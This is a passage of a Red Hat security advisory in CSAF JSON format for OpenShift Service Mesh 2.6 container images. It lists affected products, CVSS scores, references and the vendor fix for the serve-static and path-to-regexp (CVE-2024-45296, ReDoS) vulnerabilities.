"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "serve-static: Improper Sanitization in serve-static"
},
{
"cve": "CVE-2024-45296",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2024-09-09T19:20:18.127723+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2310908"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in path-to-regexp package, where it turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single-threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "path-to-regexp: Backtracking regular expressions cause ReDoS",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45296"
},
{
"category": "external",
"summary": "RHBZ#2310908",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310908"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f",
"url": "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6",
"url": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j",
"url": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j"
}
],
"release_date": "2024-09-09T19:15:13.330000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
